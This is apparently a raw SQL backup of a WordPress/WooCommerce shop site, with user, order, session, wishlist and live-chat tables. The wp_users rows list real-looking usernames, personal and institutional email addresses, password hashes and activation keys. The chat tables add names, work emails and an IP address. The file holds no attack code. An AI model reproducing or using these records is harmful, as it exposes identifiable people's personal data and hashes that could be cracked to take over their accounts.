INSERT INTO `wp_users` VALUES (2507, 'jemmaroselopez2009', '$P$B8.MIlCGvqP14a4/BWuELZ8OjB6k5f/', 'jemmaroselopez2009', 'jemmaroselopez@gmail.com', '', '2017-08-21 21:29:12', '1503350956:$P$BtrJBukbL9F/3S7W9XODfjqse0U36p0', 0, 'jemmaroselopez2009'); 
INSERT INTO `wp_users` VALUES (2508, 'rdleachman1968', '$P$BtPTSYeojwgQppAlyfNL.ldzLcC9FU/', 'rdleachman1968', 'rdleachman@aol.com', '', '2017-08-21 21:35:29', '1503351334:$P$B7bLs.WO/3Ta0KZxKgxlL2y9ZFTqwc/', 0, 'rdleachman1968'); 
INSERT INTO `wp_users` VALUES (2509, 'clandry9492010', '$P$BLr13xEgKjYFRr5/dso5AgU.cdnWBh1', 'clandry9492010', 'clandry949@yahoo.com', '', '2017-08-21 22:03:35', '1503353021:$P$BwFR3bap92tEsLfv.NTZtQkny4oaG5.', 0, 'clandry9492010'); 
INSERT INTO `wp_users` VALUES (2510, 'rpm44931954', '$P$BG7Byr38Gtu6X274I4C7Uf5/.gET9X0', 'rpm44931954', 'rpm4493@live.com', '', '2017-08-21 23:00:20', '1503356423:$P$BJMV/W7ax3ZW050U0dyQZeTE63WVV7.', 0, 'rpm44931954'); 
INSERT INTO `wp_users` VALUES (2511, 'sorenson_t1952', '$P$Bp4ZKNwXz1Cbg3pQ8JXhgWuFgL1gDb/', 'sorenson_t1952', 'sorenson_t@yahoo.com', '', '2017-08-22 00:25:22', '1503361528:$P$BYU7LX3T.D5MfAWU1Nrymz/PlHTGSy1', 0, 'sorenson_t1952'); 
INSERT INTO `wp_users` VALUES (2512, 'support1954', '$P$BTZqDGu09L/lDlC1est88bNQ8FAq8u.', 'support1954', 'support@netdivorce.com', '', '2017-08-22 01:22:14', '1503364938:$P$BnIzaZ6wUNlImWm8OEO7zAHHlobVYJ0', 0, 'support1954'); 
INSERT INTO `wp_users` VALUES (2513, 'justmevt8281997', '$P$BegcJthj8bvzT68KTEXwxm8G1oA3Ur1', 'justmevt8281997', 'justmevt828@yahoo.com', '', '2017-08-22 01:51:47', '1503366713:$P$B1bpbb/caypLr.QC1D.ZUOxuBi5rhu.', 0, 'justmevt8281997'); 
INSERT INTO `wp_users` VALUES (2514, 'kristalack1951', '$P$BDNynHcoXJ3cWebyoGgNxrq5QVKZzr0', 'kristalack1951', 'kristalack@gmail.com', '', '2017-08-22 03:00:46', '1503370853:$P$BU50jTSvsL7qseMoYnZXQmCiREgEVH/', 0, 'kristalack1951'); 
INSERT INTO `wp_users` VALUES (2515, 'dakotademmonsyy7048', '$P$BhT7vFNxy.6seOmWx.si9C58V9ZUGP.', 'dakotademmonsyy7048', 'dakotademmonsyy7048@yahoo.com', '', '2017-08-22 04:20:36', '', 0, 'dakotademmonsyy7048'); 
INSERT INTO `wp_users` VALUES (2516, 'rafaelbs1979', '$P$BogI3JgE22EJ0wK5/wyfYdXjvGQNdH/', 'rafaelbs1979', 'rafaelbs@hotmail.com', '', '2017-08-22 05:03:04', '1503378190:$P$BpgcKaBqMKSNnIeCEQP9FCCY/5MNxj0', 0, 'rafaelbs1979'); 
INSERT INTO `wp_users` VALUES (2517, 'barrattdawn2007', '$P$BhFm9LP4Jm3/SfJs8N0h2MsNAtebAN/', 'barrattdawn2007', 'barrattdawn@gmail.com', '', '2017-08-22 10:57:29', '1503399456:$P$BZK9o/RaUFF50JUm8JL1curfJdGoIB/', 0, 'barrattdawn2007'); 
INSERT INTO `wp_users` VALUES (2518, 'bam04751979', '$P$BoU2xlHl3jvrMAFKjiqysi2zsDTwYc/', 'bam04751979', 'bam0475@gmail.com', '', '2017-08-22 14:04:35', '1503410679:$P$B/2GgXTtYpK6Zj2n/t/jpwZvQjxl101', 0, 'bam04751979'); 
INSERT INTO `wp_users` VALUES (2519, 'chauhan1234431956', '$P$BTLy3xtL/1ixfsqKvcM.Jl8HvVkVJP1', 'chauhan1234431956', 'chauhan123443@yahoo.com', '', '2017-08-22 14:11:52', '1503411117:$P$BIyVv3xUUHh72/RRqULL83.15WRyCZ.', 0, 'chauhan1234431956'); 
INSERT INTO `wp_users` VALUES (2520, 'giovanny9061960', '$P$B0isRMd5Dj08b2o3dmM6RXfPYjXYWx/', 'giovanny9061960', 'giovanny906@gmail.com', '', '2017-08-22 14:11:56', '1503411123:$P$BinrELGW66K.8FndqLQrFl2fAh8AWD0', 0, 'giovanny9061960'); 
INSERT INTO `wp_users` VALUES (2521, 'julia.angwin1981', '$P$BX/DsZZx5sXy/wDLSr07OcpL9i2iem/', 'julia-angwin1981', 'julia.angwin@propublica.org', '', '2017-08-22 14:33:03', '1503412387:$P$BR9m1IYllMM78fC3MwezgmC3Dy5MMf.', 0, 'julia.angwin1981'); 
INSERT INTO `wp_users` VALUES (2522, 'judy.benckendorf', '$P$BmFyevmB4vnZH.v82j34Ox8LHIT2ju.', 'judy-benckendorf', 'judy.benckendorf@navy.mil', '', '2017-08-22 14:57:40', '', 0, 'judy.benckendorf');
#
# End of data contents of table `wp_users`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_api_keys`


#
# Delete any existing table `wp_woocommerce_api_keys`
#

DROP TABLE IF EXISTS `wp_woocommerce_api_keys`;


#
# Table structure of table `wp_woocommerce_api_keys`
#

CREATE TABLE `wp_woocommerce_api_keys` (
  `key_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `description` longtext COLLATE utf8mb4_unicode_ci,
  `permissions` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL,
  `consumer_key` char(64) COLLATE utf8mb4_unicode_ci NOT NULL,
  `consumer_secret` char(43) COLLATE utf8mb4_unicode_ci NOT NULL,
  `nonces` longtext COLLATE utf8mb4_unicode_ci,
  `truncated_key` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_api_keys`
#

#
# End of data contents of table `wp_woocommerce_api_keys`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_attribute_taxonomies`


#
# Delete any existing table `wp_woocommerce_attribute_taxonomies`
#

DROP TABLE IF EXISTS `wp_woocommerce_attribute_taxonomies`;


#
# Table structure of table `wp_woocommerce_attribute_taxonomies`
#

CREATE TABLE `wp_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_label` longtext COLLATE utf8mb4_unicode_ci,
  `attribute_type` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_orderby` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_attribute_taxonomies`
#
 
INSERT INTO `wp_woocommerce_attribute_taxonomies` VALUES (1, 'sizes-available', 'SIZES AVAILABLE', 'text', 'menu_order', 0);
#
# End of data contents of table `wp_woocommerce_attribute_taxonomies`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_downloadable_product_permissions`


#
# Delete any existing table `wp_woocommerce_downloadable_product_permissions`
#

DROP TABLE IF EXISTS `wp_woocommerce_downloadable_product_permissions`;


#
# Table structure of table `wp_woocommerce_downloadable_product_permissions`
#

CREATE TABLE `wp_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `download_id` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `order_id` bigint(20) NOT NULL DEFAULT '0',
  `order_key` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_email` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `downloads_remaining` varchar(9) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`permission_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(191),`download_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_downloadable_product_permissions`
#

#
# End of data contents of table `wp_woocommerce_downloadable_product_permissions`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_order_itemmeta`


#
# Delete any existing table `wp_woocommerce_order_itemmeta`
#

DROP TABLE IF EXISTS `wp_woocommerce_order_itemmeta`;


#
# Table structure of table `wp_woocommerce_order_itemmeta`
#

CREATE TABLE `wp_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_order_itemmeta`
#
 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (1, 1, '_qty', '1'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (2, 1, '_tax_class', ''); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (3, 1, '_product_id', '347'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (4, 1, '_variation_id', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (5, 1, '_line_subtotal', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (6, 1, '_line_total', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (7, 1, '_line_subtotal_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (8, 1, '_line_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (9, 1, '_line_tax_data', 'a:2:{s:5:"total";a:0:{}s:8:"subtotal";a:0:{}}'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (10, 2, '_qty', '1'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (11, 2, '_tax_class', ''); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (12, 2, '_product_id', '649'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (13, 2, '_variation_id', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (14, 2, '_line_subtotal', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (15, 2, '_line_total', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (16, 2, '_line_subtotal_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (17, 2, '_line_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (18, 2, '_line_tax_data', 'a:2:{s:5:"total";a:0:{}s:8:"subtotal";a:0:{}}'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (19, 3, '_qty', '1'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (20, 3, '_tax_class', ''); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (21, 3, '_product_id', '912'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (22, 3, '_variation_id', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (23, 3, '_line_subtotal', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (24, 3, '_line_total', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (25, 3, '_line_subtotal_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (26, 3, '_line_tax', '0'); 
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (27, 3, '_line_tax_data', 'a:2:{s:5:"total";a:0:{}s:8:"subtotal";a:0:{}}');
#
# End of data contents of table `wp_woocommerce_order_itemmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_order_items`


#
# Delete any existing table `wp_woocommerce_order_items`
#

DROP TABLE IF EXISTS `wp_woocommerce_order_items`;


#
# Table structure of table `wp_woocommerce_order_items`
#

CREATE TABLE `wp_woocommerce_order_items` (
  `order_item_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_item_name` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `order_item_type` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `order_id` bigint(20) NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_order_items`
#
 
INSERT INTO `wp_woocommerce_order_items` VALUES (1, 'GPL 200', 'line_item', 930); 
INSERT INTO `wp_woocommerce_order_items` VALUES (2, '280AB', 'line_item', 930); 
INSERT INTO `wp_woocommerce_order_items` VALUES (3, 'EPON™ 8132', 'line_item', 930);
#
# End of data contents of table `wp_woocommerce_order_items`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_payment_tokenmeta`


#
# Delete any existing table `wp_woocommerce_payment_tokenmeta`
#

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokenmeta`;


#
# Table structure of table `wp_woocommerce_payment_tokenmeta`
#

CREATE TABLE `wp_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_payment_tokenmeta`
#

#
# End of data contents of table `wp_woocommerce_payment_tokenmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_payment_tokens`


#
# Delete any existing table `wp_woocommerce_payment_tokens`
#

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokens`;


#
# Table structure of table `wp_woocommerce_payment_tokens`
#

CREATE TABLE `wp_woocommerce_payment_tokens` (
  `token_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` bigint(20) NOT NULL DEFAULT '0',
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_payment_tokens`
#

#
# End of data contents of table `wp_woocommerce_payment_tokens`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_sessions`


#
# Delete any existing table `wp_woocommerce_sessions`
#

DROP TABLE IF EXISTS `wp_woocommerce_sessions`;


#
# Table structure of table `wp_woocommerce_sessions`
#

CREATE TABLE `wp_woocommerce_sessions` (
  `session_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `session_key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_expiry` bigint(20) NOT NULL,
  PRIMARY KEY (`session_key`),
  UNIQUE KEY `session_id` (`session_id`)
) ENGINE=InnoDB AUTO_INCREMENT=380 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_sessions`
#
 
INSERT INTO `wp_woocommerce_sessions` VALUES (379, '2491', 'a:1:{s:10:"wc_notices";N;}', 1503493161);
#
# End of data contents of table `wp_woocommerce_sessions`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_shipping_zone_locations`


#
# Delete any existing table `wp_woocommerce_shipping_zone_locations`
#

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_locations`;


#
# Table structure of table `wp_woocommerce_shipping_zone_locations`
#

CREATE TABLE `wp_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) NOT NULL,
  `location_code` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_shipping_zone_locations`
#

#
# End of data contents of table `wp_woocommerce_shipping_zone_locations`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_shipping_zone_methods`


#
# Delete any existing table `wp_woocommerce_shipping_zone_methods`
#

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_methods`;


#
# Table structure of table `wp_woocommerce_shipping_zone_methods`
#

CREATE TABLE `wp_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) NOT NULL,
  `instance_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `method_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `method_order` bigint(20) NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`instance_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_shipping_zone_methods`
#

#
# End of data contents of table `wp_woocommerce_shipping_zone_methods`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_shipping_zones`


#
# Delete any existing table `wp_woocommerce_shipping_zones`
#

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zones`;


#
# Table structure of table `wp_woocommerce_shipping_zones`
#

CREATE TABLE `wp_woocommerce_shipping_zones` (
  `zone_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `zone_order` bigint(20) NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_shipping_zones`
#

#
# End of data contents of table `wp_woocommerce_shipping_zones`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_tax_rate_locations`


#
# Delete any existing table `wp_woocommerce_tax_rate_locations`
#

DROP TABLE IF EXISTS `wp_woocommerce_tax_rate_locations`;


#
# Table structure of table `wp_woocommerce_tax_rate_locations`
#

CREATE TABLE `wp_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `location_code` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `tax_rate_id` bigint(20) NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_tax_rate_locations`
#

#
# End of data contents of table `wp_woocommerce_tax_rate_locations`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_woocommerce_tax_rates`


#
# Delete any existing table `wp_woocommerce_tax_rates`
#

DROP TABLE IF EXISTS `wp_woocommerce_tax_rates`;


#
# Table structure of table `wp_woocommerce_tax_rates`
#

CREATE TABLE `wp_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT '0',
  `tax_rate_shipping` int(1) NOT NULL DEFAULT '1',
  `tax_rate_order` bigint(20) NOT NULL,
  `tax_rate_class` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`(191)),
  KEY `tax_rate_state` (`tax_rate_state`(191)),
  KEY `tax_rate_class` (`tax_rate_class`(191)),
  KEY `tax_rate_priority` (`tax_rate_priority`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_woocommerce_tax_rates`
#

#
# End of data contents of table `wp_woocommerce_tax_rates`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_wplc_chat_msgs`


#
# Delete any existing table `wp_wplc_chat_msgs`
#

DROP TABLE IF EXISTS `wp_wplc_chat_msgs`;


#
# Table structure of table `wp_wplc_chat_msgs`
#

CREATE TABLE `wp_wplc_chat_msgs` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `chat_sess_id` int(11) NOT NULL,
  `msgfrom` varchar(150) NOT NULL,
  `msg` varchar(700) NOT NULL,
  `timestamp` datetime NOT NULL,
  `status` int(3) NOT NULL,
  `originates` int(3) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_wplc_chat_msgs`
#
 
INSERT INTO `wp_wplc_chat_msgs` VALUES (1, 2, 'Admin', 'Welcome. How may I help you?', '2016-09-23 19:53:07', 1, 1); 
INSERT INTO `wp_wplc_chat_msgs` VALUES (2, 2, 'Admin', 'hi', '2016-09-23 19:53:12', 1, 1); 
INSERT INTO `wp_wplc_chat_msgs` VALUES (3, 2, 'fat boy', 'nice work idiot', '2016-09-23 19:53:16', 1, 2); 
INSERT INTO `wp_wplc_chat_msgs` VALUES (4, 2, 'fat boy', 'this is not useful', '2016-09-23 19:55:11', 0, 2); 
INSERT INTO `wp_wplc_chat_msgs` VALUES (5, 2, 'fat boy', 'you know nothing about web design', '2016-09-23 19:55:23', 0, 2);
#
# End of data contents of table `wp_wplc_chat_msgs`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_wplc_chat_sessions`


#
# Delete any existing table `wp_wplc_chat_sessions`
#

DROP TABLE IF EXISTS `wp_wplc_chat_sessions`;


#
# Table structure of table `wp_wplc_chat_sessions`
#

CREATE TABLE `wp_wplc_chat_sessions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `name` varchar(700) NOT NULL,
  `email` varchar(700) NOT NULL,
  `ip` varchar(700) NOT NULL,
  `status` int(11) NOT NULL,
  `session` varchar(100) NOT NULL,
  `url` varchar(700) NOT NULL,
  `last_active_timestamp` datetime NOT NULL,
  `other` longtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_wplc_chat_sessions`
#
 
INSERT INTO `wp_wplc_chat_sessions` VALUES (1, '2016-09-23 19:53:43', 'zayyan', 'zchowdhury@mschem.com', 'a:2:{s:2:"ip";s:10:"107.3.77.7";s:10:"user_agent";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";}', 7, '1474660886391', 'https://c81.bc1.myftpupload.com/', '2016-09-23 20:01:27', 'a:2:{s:9:"user_type";i:1;s:14:"user_is_mobile";b:0;}'); 
INSERT INTO `wp_wplc_chat_sessions` VALUES (2, '2016-09-23 19:52:34', 'fat boy', 'cpavlik@mschem.com', 'a:2:{s:2:"ip";s:10:"107.3.77.7";s:10:"user_agent";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";}', 10, '1474660762007', 'https://c81.bc1.myftpupload.com/', '2016-09-23 20:03:55', 'a:3:{s:9:"user_type";i:1;s:14:"user_is_mobile";b:0;s:3:"aid";i:2;}');
#
# End of data contents of table `wp_wplc_chat_sessions`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_wplc_offline_messages`


#
# Delete any existing table `wp_wplc_offline_messages`
#

DROP TABLE IF EXISTS `wp_wplc_offline_messages`;


#
# Table structure of table `wp_wplc_offline_messages`
#

CREATE TABLE `wp_wplc_offline_messages` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `name` varchar(700) NOT NULL,
  `email` varchar(700) NOT NULL,
  `message` varchar(700) NOT NULL,
  `ip` varchar(700) NOT NULL,
  `user_agent` varchar(700) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_wplc_offline_messages`
#

#
# End of data contents of table `wp_wplc_offline_messages`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_yith_wcwl`


#
# Delete any existing table `wp_yith_wcwl`
#

DROP TABLE IF EXISTS `wp_yith_wcwl`;


#
# Table structure of table `wp_yith_wcwl`
#

CREATE TABLE `wp_yith_wcwl` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `prod_id` int(11) NOT NULL,
  `quantity` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `wishlist_id` int(11) DEFAULT NULL,
  `dateadded` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`ID`),
  KEY `prod_id` (`prod_id`)
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_yith_wcwl`
#
 
INSERT INTO `wp_yith_wcwl` VALUES (3, 263, 1, 1, 1, '2016-08-17 02:48:39'); 
INSERT INTO `wp_yith_wcwl` VALUES (4, 427, 1, 1, 1, '2016-08-18 14:55:39'); 
INSERT INTO `wp_yith_wcwl` VALUES (6, 643, 1, 1, 1, '2016-08-27 19:09:29'); 
INSERT INTO `wp_yith_wcwl` VALUES (7, 968, 1, 1, 1, '2016-08-31 14:39:41'); 
INSERT INTO `wp_yith_wcwl` VALUES (8, 642, 1, 1, 1, '2016-09-26 20:17:03'); 
INSERT INTO `wp_yith_wcwl` VALUES (9, 647, 1, 2, 2, '2016-09-27 22:16:17'); 
INSERT INTO `wp_yith_wcwl` VALUES (10, 1292, 1, 2, 2, '2016-09-28 14:59:31'); 
INSERT INTO `wp_yith_wcwl` VALUES (11, 960, 1, 16, 4, '2016-09-28 20:46:17'); 
INSERT INTO `wp_yith_wcwl` VALUES (13, 1287, 1, 1, 1, '2016-10-03 15:23:26'); 
INSERT INTO `wp_yith_wcwl` VALUES (14, 783, 1, 2, 2, '2016-10-04 15:01:17'); 
INSERT INTO `wp_yith_wcwl` VALUES (15, 788, 1, 2, 2, '2016-10-04 15:01:40'); 
INSERT INTO `wp_yith_wcwl` VALUES (16, 818, 1, 2, 2, '2016-10-04 15:02:47'); 
INSERT INTO `wp_yith_wcwl` VALUES (17, 436, 1, 2, 2, '2016-10-04 15:06:29'); 
INSERT INTO `wp_yith_wcwl` VALUES (18, 437, 1, 2, 2, '2016-10-04 15:06:38'); 
INSERT INTO `wp_yith_wcwl` VALUES (19, 1662, 1, 1, 1, '2016-10-06 20:53:15'); 
INSERT INTO `wp_yith_wcwl` VALUES (20, 1102, 1, 1, 1, '2016-10-11 17:51:50'); 
INSERT INTO `wp_yith_wcwl` VALUES (21, 1152, 1, 106, 16, '2016-10-23 08:31:15'); 
INSERT INTO `wp_yith_wcwl` VALUES (22, 1677, 1, 118, 19, '2016-10-25 17:53:46'); 
INSERT INTO `wp_yith_wcwl` VALUES (23, 302, 1, 118, 19, '2016-10-25 17:54:32'); 
INSERT INTO `wp_yith_wcwl` VALUES (24, 1149, 1, 125, 21, '2016-10-27 17:08:56'); 
INSERT INTO `wp_yith_wcwl` VALUES (25, 1338, 1, 134, 23, '2016-11-01 21:35:11'); 
INSERT INTO `wp_yith_wcwl` VALUES (26, 1059, 1, 145, 26, '2016-11-04 20:49:32'); 
INSERT INTO `wp_yith_wcwl` VALUES (27, 887, 1, 145, 26, '2016-11-04 20:49:32'); 
